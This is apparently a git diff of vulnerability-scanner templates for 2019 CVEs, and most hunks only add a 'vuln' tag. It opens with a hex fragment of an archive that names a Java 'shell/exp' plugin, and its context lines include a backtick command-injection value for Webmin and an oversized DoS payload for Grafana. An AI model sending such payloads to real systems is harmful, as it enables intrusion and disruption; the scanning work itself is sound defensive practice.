7bf61cd1787363d75293c0c87fafdbf5903d1008bdf73d14b4f9d14702e34f681a87dc92739552f6147c14f8d6bd1e9129f68e045b91804fd5dc44eb71b3ad474341acef12192e5fce1a304e33038d218d50d730ac13fdf9d704bf4a41d223db7bdb40e33f48b2596847e70bb140a4f333fcbb73f01d5332380769a31f18663fa472782825f0487288562866390eb7255bbcefeb62b52cdf8ab27c795d2ef2ea0e4c6a5257504b01021e03140000000800033f2557544c2527eb00000004020000140018000000000001000000fd810000000061746c61737369616e2d706c7567696e2e786d6c555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000040018000000000000001000fd4139010000636f6d2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000080018000000000000001000fd4177010000636f6d2f63646c2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000854225570000000000000000000000000e0018000000000000001000fd41b9010000636f6d2f63646c2f7368656c6c2f5554050003b9e4f66475780b000104e803000004e8030000504b01021e03140000000800bd422557a3de4c616701000046020000170018000000000000000000b48101020000636f6d2f63646c2f7368656c6c2f6578702e636c617373555405000326e5f66475780b000104e803000004e8030000504b01021e031400000008003a422557483e79dabf0000000f010000160018000000000001000000b481b9030000636f6d2f63646c2f7368656c6c2f6578702e6a617661555405000330e4f66475780b000104e803000004e8030000504b05060000000006000600ff010000c80400000000")}}' diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index c170e1caea1..589e8f17240 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -32,7 +32,7 @@ info: - http.component:"atlassian jira" - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:jira" - tags: cve,cve2019,atlassian,jira,ssti,rce,kev,vkev + tags: cve,cve2019,atlassian,jira,ssti,rce,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index 24ff4d1df96..f01d6557a6b 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -34,7 +34,7 @@ info: vendor: yuzopro product: yuzo framework: wordpress - tags: cve,cve2019,wpscan,wordpress,wp-plugin,xss,yuzopro,vkev + tags: cve,cve2019,wpscan,wordpress,wp-plugin,xss,yuzopro,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-11886.yaml b/http/cves/2019/CVE-2019-11886.yaml index 122b5f342f5..d8e129c56ad 100644 --- a/http/cves/2019/CVE-2019-11886.yaml +++ b/http/cves/2019/CVE-2019-11886.yaml @@ -25,7 +25,7 @@ info: product: yellow_pencil_visual_theme_customizer framework: wordpress fofa-query: body="wp-content/plugins/yellow-pencil-visual-theme-customizer/" && body="wp-" - tags: cve,cve2019,wp,wordpress,wp-plugin,yellow-pencil-visual-theme-customizer,vkev + tags: cve,cve2019,wp,wordpress,wp-plugin,yellow-pencil-visual-theme-customizer,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml index 18e8c042f25..01b1c62fdb7 100644 --- a/http/cves/2019/CVE-2019-12276.yaml +++ b/http/cves/2019/CVE-2019-12276.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: grandnode product: grandnode - tags: cve,cve2019,packetstorm,lfi,grandnode,vkev + tags: cve,cve2019,packetstorm,lfi,grandnode,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-12314.yaml b/http/cves/2019/CVE-2019-12314.yaml index 80e79b635c8..fafda69d687 100644 --- a/http/cves/2019/CVE-2019-12314.yaml +++ b/http/cves/2019/CVE-2019-12314.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: deltek product: maconomy - tags: cve,cve2019,lfi,packetstorm,deltek + tags: cve,cve2019,lfi,packetstorm,deltek,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml index fe26a72c0e4..cef227e0f37 100644 --- a/http/cves/2019/CVE-2019-12461.yaml +++ b/http/cves/2019/CVE-2019-12461.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: webport product: web_port - tags: cve,cve2019,xss,webport + tags: cve,cve2019,xss,webport,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index 68ef740f4a3..30469c887f1 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"ZyWall" fofa-query: title="zywall" google-query: intitle:"zywall" - tags: cve,cve2019,zyxel,zywall,xss + tags: cve,cve2019,zyxel,zywall,xss,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml index 89224476878..359e3f03172 100644 --- a/http/cves/2019/CVE-2019-12583.yaml +++ b/http/cves/2019/CVE-2019-12583.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"zywall" fofa-query: title="zywall" google-query: intitle:"zywall" - tags: cve,cve2019,zyxel,zywall,xss + tags: cve,cve2019,zyxel,zywall,xss,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index 91e59c7c916..41d94b140d8 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -41,7 +41,7 @@ info: - intitle:"icewarp" - powered by icewarp 10.4.4 - intitle:"icewarp server administration" - tags: cve,cve2019,packetstorm,lfi,icewarp,vkev + tags: cve,cve2019,packetstorm,lfi,icewarp,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml index 2c83e808322..71d11ceb3a1 100644 --- a/http/cves/2019/CVE-2019-12725.yaml +++ b/http/cves/2019/CVE-2019-12725.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.title:"zeroshell" fofa-query: title="zeroshell" google-query: intitle:"zeroshell" - tags: cve,cve2019,packetstorm,rce,zeroshell,vkev + tags: cve,cve2019,packetstorm,rce,zeroshell,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index 27936d13c7e..c521e369a9b 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -31,7 +31,7 @@ info: - http.html:LiveZilla - http.html:livezilla fofa-query: body=livezilla - tags: cve,cve2019,xss,edb,packetstorm,livezilla + tags: cve,cve2019,xss,edb,packetstorm,livezilla,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml index 2d30e7da34e..8f566e0f83e 100644 --- a/http/cves/2019/CVE-2019-12985.yaml +++ b/http/cves/2019/CVE-2019-12985.yaml @@ -31,7 +31,7 @@ info: - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" - tags: cve,cve2019,citrix,rce,unauth,oast,tenable,vkev + tags: cve,cve2019,citrix,rce,unauth,oast,tenable,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index 53af6c23149..e9455e5e1c1 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml @@ -31,7 +31,7 @@ info: - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" - tags: cve2019,cve,unauth,oast,tenable,citrix,rce,vkev + tags: cve2019,cve,unauth,oast,tenable,citrix,rce,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index c25988d2044..2c5543b4351 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -31,7 +31,7 @@ info: - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" - tags: cve,cve2019,citrix,rce,unauth,oast,tenable,vkev + tags: cve,cve2019,citrix,rce,unauth,oast,tenable,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml index 739786002e8..5cdf364fc89 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -31,7 +31,7 @@ info: - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" - tags: cve,cve2019,rce,unauth,oast,tenable,citrix,vkev + tags: cve,cve2019,rce,unauth,oast,tenable,citrix,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index 9ed8b7dda70..6031e1b6acb 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -32,7 +32,7 @@ info: - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" - tags: cve,cve2019,citrix,rce,unauth,tenable,intrusive,vkev + tags: cve,cve2019,citrix,rce,unauth,tenable,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml index a95e700e5ee..eeba64f307c 100644 --- a/http/cves/2019/CVE-2019-13101.yaml +++ b/http/cves/2019/CVE-2019-13101.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: dlink product: dir-600m - tags: cve2019,cve,packetstorm,edb,dlink,router,iot,vkev + tags: cve2019,cve,packetstorm,edb,dlink,router,iot,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-13372.yaml b/http/cves/2019/CVE-2019-13372.yaml index 7ec8b3ecc78..be316191f05 100644 --- a/http/cves/2019/CVE-2019-13372.yaml +++ b/http/cves/2019/CVE-2019-13372.yaml @@ -25,7 +25,7 @@ info: vendor: dlink product: central_wifimanager shodan-query: html:"D-Link Central WiFiManager" - tags: cve,cve2019,d-link,wifimanager,vkev + tags: cve,cve2019,d-link,wifimanager,vkev,vuln variables: string: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml index 5b6f467b54f..16fefc87473 100644 --- a/http/cves/2019/CVE-2019-13392.yaml +++ b/http/cves/2019/CVE-2019-13392.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mindpalette product: natemail - tags: cve,cve2019,natemail,xss,mindpalette + tags: cve,cve2019,natemail,xss,mindpalette,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml index 2fb2df90a09..ef8dbcff456 100644 --- a/http/cves/2019/CVE-2019-13396.yaml +++ b/http/cves/2019/CVE-2019-13396.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: getflightpath product: flightpath - tags: cve,cve2019,flightpath,lfi,edb,getflightpath + tags: cve,cve2019,flightpath,lfi,edb,getflightpath,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-13462.yaml b/http/cves/2019/CVE-2019-13462.yaml index dded822eabf..f31337ab0c0 100644 --- a/http/cves/2019/CVE-2019-13462.yaml +++ b/http/cves/2019/CVE-2019-13462.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.title:"lansweeper - login" fofa-query: title="lansweeper - login" google-query: intitle:"lansweeper - login" - tags: cve,cve2019,sqli,lansweeper,vkev + tags: cve,cve2019,sqli,lansweeper,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index 264daca8e9d..b252b3c3172 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -29,7 +29,7 @@ info: vendor: nevma product: adaptive_images framework: wordpress - tags: cve,cve2019,wordpress,wp-plugin,lfi,wp,nevma,vkev + tags: cve,cve2019,wordpress,wp-plugin,lfi,wp,nevma,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index 2c95e3eb6fe..66ae1927229 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: alfresco product: alfresco - tags: cve,cve2019,redirect,alfresco,vkev + tags: cve,cve2019,redirect,alfresco,vkev,vuln http: - method: POST diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index 2f247b0acc6..1a077416c90 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: temenos product: t24 - tags: cve,cve2019,temenos,lfi,unauth,vkev + tags: cve,cve2019,temenos,lfi,unauth,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 3905f3472dc..538808a9f57 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: aptana product: jaxer - tags: cve2019,cve,lfi,edb,packetstorm,aptana + tags: cve2019,cve,lfi,edb,packetstorm,aptana,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index 951d7a93acc..7e606772a04 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -29,7 +29,7 @@ info: vendor: microsoft product: windows shodan-query: cpe:"cpe:2.3:o:microsoft:windows" - tags: cve,cve2019,lfi,odoo,packetstorm,palletsprojects,microsoft + tags: cve,cve2019,lfi,odoo,packetstorm,palletsprojects,microsoft,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index f173eb3e7d7..095022f9e39 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: "instagram-php-api_project" product: "instagram-php-api" - tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,packetstorm,instagram-php-api_project + tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,packetstorm,instagram-php-api_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index bd5554a11d1..49ed920f918 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -39,7 +39,7 @@ info: - title="openemr" - app="openemr" google-query: intitle:"openemr" - tags: cve2019,cve,lfi,authenticated,edb,openemr,open-emr + tags: cve2019,cve,lfi,authenticated,edb,openemr,open-emr,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index 7b7bf93b75a..1f9e3867704 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: open-school product: open-school - tags: cve,cve2019,xss,open-school,packetstorm + tags: cve,cve2019,xss,open-school,packetstorm,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 7e48c5f69c1..b6363b8e6ca 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -40,7 +40,7 @@ info: google-query: - intitle:"osticket" - intitle:"osticket installer" - tags: cve,cve2019,packetstorm,osticket,xss,intrusive + tags: cve,cve2019,packetstorm,osticket,xss,intrusive,vuln variables: user_name: "{{to_lower(rand_text_alphanumeric(6))}}" user_pass: "{{rand_text_alphanumeric(12)}}" diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index 8dc2cf84616..5afc6e50fef 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -29,7 +29,7 @@ info: vendor: kunalnagar product: custom_404_pro framework: wordpress - tags: cve,cve2019,wpscan,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss,kunalnagar + tags: cve,cve2019,wpscan,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss,kunalnagar,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index 89f78a2291d..d0aef2d8ec8 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -36,7 +36,7 @@ info: google-query: - intitle:sugarcrm - intext:"sugarcrm inc. all rights reserved" - tags: cve,cve2019,xss,sugarcrm,edb + tags: cve,cve2019,xss,sugarcrm,edb,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index 3a9f0009d51..c7ba007a1b2 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -37,7 +37,7 @@ info: - title="grafana" - app="grafana" google-query: intitle:"grafana" - tags: cve,cve2019,grafana,dos,intrusive + tags: cve,cve2019,grafana,dos,intrusive,vuln variables: payload: '{{repeat("A", 4000)}}' diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml index 39fa7010e7c..c517721e1f7 100644 --- a/http/cves/2019/CVE-2019-15107.yaml +++ b/http/cves/2019/CVE-2019-15107.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"webmin" fofa-query: title="webmin" google-query: intitle:"webmin" - tags: cve,cve2019,packetstorm,webmin,rce,kev,edb,vkev + tags: cve,cve2019,packetstorm,webmin,rce,kev,edb,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index 954bd4d9071..9dd2e425f01 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -32,7 +32,7 @@ info: - http.html:"LISTSERV" - http.html:"listserv" fofa-query: body="listserv" - tags: cve2019,cve,xss,listserv,edb,lsoft + tags: cve2019,cve,xss,listserv,edb,lsoft,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index 60389fa953b..77e05f9dc72 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -34,7 +34,7 @@ info: - http.title:"webmin" fofa-query: title="webmin" google-query: intitle:"webmin" - tags: cve,cve2019,webmin,rce,vkev + tags: cve,cve2019,webmin,rce,vkev,vuln variables: cmd: '`id`' diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index 2ca291e0587..10b66188e87 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -29,7 +29,7 @@ info: product: "my_calendar" framework: wordpress fofa-query: "\"wordpress\" && body=\"wp-content/plugins/my-calendar\"" - tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,my_calendar_project + tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,my_calendar_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-15774.yaml b/http/cves/2019/CVE-2019-15774.yaml index 85e17fafcda..1681c947949 100644 --- a/http/cves/2019/CVE-2019-15774.yaml +++ b/http/cves/2019/CVE-2019-15774.yaml @@ -25,7 +25,7 @@ info: shodan-query: http.html:"/wp-content/plugins/nd-booking" fofa-query: body="/wp-content/plugins/nd-booking/" publicwww-query: "/wp-content/plugins/nd-booking/" - tags: cve,cve2019,wordpress,wp-plugin,nd-booking,intrusive,vkev + tags: cve,cve2019,wordpress,wp-plugin,nd-booking,intrusive,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-15811.yaml b/http/cves/2019/CVE-2019-15811.yaml index 8511146f378..3d09cc1b6fc 100644 --- a/http/cves/2019/CVE-2019-15811.yaml +++ b/http/cves/2019/CVE-2019-15811.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: domainmod product: domainmod - tags: cve,cve2019,domainmod,xss,authenticated,edb + tags: cve,cve2019,domainmod,xss,authenticated,edb,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml index d672e0ef2c8..7a03c1ed65a 100644 --- a/http/cves/2019/CVE-2019-15829.yaml +++ b/http/cves/2019/CVE-2019-15829.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/photoblocks-grid-gallery/ fofa-query: body=/wp-content/plugins/photoblocks-grid-gallery/ publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" - tags: cve,cve2019,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs + tags: cve,cve2019,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml index f896659216a..21835e39959 100644 --- a/http/cves/2019/CVE-2019-15858.yaml +++ b/http/cves/2019/CVE-2019-15858.yaml @@ -29,7 +29,7 @@ info: vendor: webcraftic product: woody_ad_snippets framework: wordpress - tags: cve,cve2019,wordpress,wp-plugin,xss,wp,webcraftic + tags: cve,cve2019,wordpress,wp-plugin,xss,wp,webcraftic,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml index 48bbe0fd748..e4b1a343cdf 100644 --- a/http/cves/2019/CVE-2019-15859.yaml +++ b/http/cves/2019/CVE-2019-15859.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: socomec product: diris_a-40_firmware - tags: cve,cve2019,seclists,packetstorm,disclosure,socomec,diris,iot + tags: cve,cve2019,seclists,packetstorm,disclosure,socomec,diris,iot,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index 92ab8bc1660..921db101fdd 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -28,7 +28,7 @@ info: vendor: wpdownloadmanager product: "wordpress_download_manager" framework: wordpress - tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,wpdownloadmanager + tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,wpdownloadmanager,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 15f777833bd..731003cdaff 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -33,7 +33,7 @@ info: - html:"ShareCenter" - http.html:"sharecenter" fofa-query: body="sharecenter" - tags: cve,cve2019,lfi,rce,kev,sharecenter,dlink,vkev + tags: cve,cve2019,lfi,rce,kev,sharecenter,dlink,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-16097.yaml b/http/cves/2019/CVE-2019-16097.yaml index b88d2f933ab..c05dc150b4c 100644 --- a/http/cves/2019/CVE-2019-16097.yaml +++ b/http/cves/2019/CVE-2019-16097.yaml @@ -28,7 +28,7 @@ info: product: harbor shodan-query: http.favicon.hash:657337228 fofa-query: icon_hash=657337228 - tags: cve,cve2019,intrusive,harbor,linuxfoundation + tags: cve,cve2019,intrusive,harbor,linuxfoundation,vuln http: - method: POST diff --git a/http/cves/2019/CVE-2019-16123.yaml b/http/cves/2019/CVE-2019-16123.yaml index 84392f6fbae..9dbdda46920 100644 --- a/http/cves/2019/CVE-2019-16123.yaml +++ b/http/cves/2019/CVE-2019-16123.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: kartatopia product: piluscart - tags: cve,cve2019,piluscart,lfi,packetstorm,edb,kartatopia + tags: cve,cve2019,piluscart,lfi,packetstorm,edb,kartatopia,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml index 7f3afb27ec3..829f6ca865f 100644 --- a/http/cves/2019/CVE-2019-16278.yaml +++ b/http/cves/2019/CVE-2019-16278.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: nazgul product: nostromo_nhttpd - tags: cve,cve2019,edb,rce,packetstorm,nazgul,kev,vkev + tags: cve,cve2019,edb,rce,packetstorm,nazgul,kev,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-16313.yaml b/http/cves/2019/CVE-2019-16313.yaml index ecbf679ff5f..b18f9226c3e 100644 --- a/http/cves/2019/CVE-2019-16313.yaml +++ b/http/cves/2019/CVE-2019-16313.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: ifw8 product: fr6_firmware - tags: cve,cve2019,exposure,router,iot,ifw8 + tags: cve,cve2019,exposure,router,iot,ifw8,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index 0c6e325805e..bb29378b2ab 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -28,7 +28,7 @@ info: vendor: "api_bearer_auth_project" product: "api_bearer_auth" framework: wordpress - tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,auth,api_bearer_auth_project + tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,auth,api_bearer_auth_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-16469.yaml b/http/cves/2019/CVE-2019-16469.yaml index 4e100999f7c..cf8b91c9d08 100644 --- a/http/cves/2019/CVE-2019-16469.yaml +++ b/http/cves/2019/CVE-2019-16469.yaml @@ -34,7 +34,7 @@ info: - cpe:"cpe:2.3:a:adobe:experience_manager" fofa-query: title="aem sign in" google-query: intitle:"aem sign in" - tags: cve,cve2019,aem,eli,csti,adobe + tags: cve,cve2019,aem,eli,csti,adobe,vuln variables: num1: "{{rand_int(800000, 999999)}}" num2: "{{rand_int(800000, 999999)}}" diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index 5c3468bd5d5..f087d1bd9f4 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml @@ -28,7 +28,7 @@ info: vendor: checklist product: checklist framework: wordpress - tags: cve,cve2019,xss,wp-plugin,packetstorm,wordpress,checklist + tags: cve,cve2019,xss,wp-plugin,packetstorm,wordpress,checklist,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-1653.yaml b/http/cves/2019/CVE-2019-1653.yaml index b44f6dd143a..d651b6acdf8 100644 --- a/http/cves/2019/CVE-2019-1653.yaml +++ b/http/cves/2019/CVE-2019-1653.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: cisco product: rv320_firmware - tags: cve,cve2019,packetstorm,kev,edb,cisco,router,exposure,vkev + tags: cve,cve2019,packetstorm,kev,edb,cisco,router,exposure,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml index e0861cc1cac..67aaf406e67 100644 --- a/http/cves/2019/CVE-2019-16662.yaml +++ b/http/cves/2019/CVE-2019-16662.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve2019,cve,intrusive,rconfig,packetstorm,rce,vkev + tags: cve2019,cve,intrusive,rconfig,packetstorm,rce,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index e89033e1037..1e3212705d2 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -40,7 +40,7 @@ info: google-query: - intext:"powered by vbulletin" - intitle:"powered by vbulletin" - tags: cve,cve2019,rce,kev,seclists,vbulletin,vkev + tags: cve,cve2019,rce,kev,seclists,vbulletin,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-16920.yaml b/http/cves/2019/CVE-2019-16920.yaml index 886f0f4ec91..02d32730cb7 100644 --- a/http/cves/2019/CVE-2019-16920.yaml +++ b/http/cves/2019/CVE-2019-16920.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: dlink product: dir-655_firmware - tags: cve2019,cve,dlink,rce,router,unauth,kev,vkev + tags: cve2019,cve,dlink,rce,router,unauth,kev,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml index 39d62c0eecd..98640cf0261 100644 --- a/http/cves/2019/CVE-2019-16931.yaml +++ b/http/cves/2019/CVE-2019-16931.yaml @@ -30,7 +30,7 @@ info: vendor: themeisle product: visualizer framework: wordpress - tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth,wpscan,themeisle + tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth,wpscan,themeisle,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index ca78c6164d3..244ffd6dd16 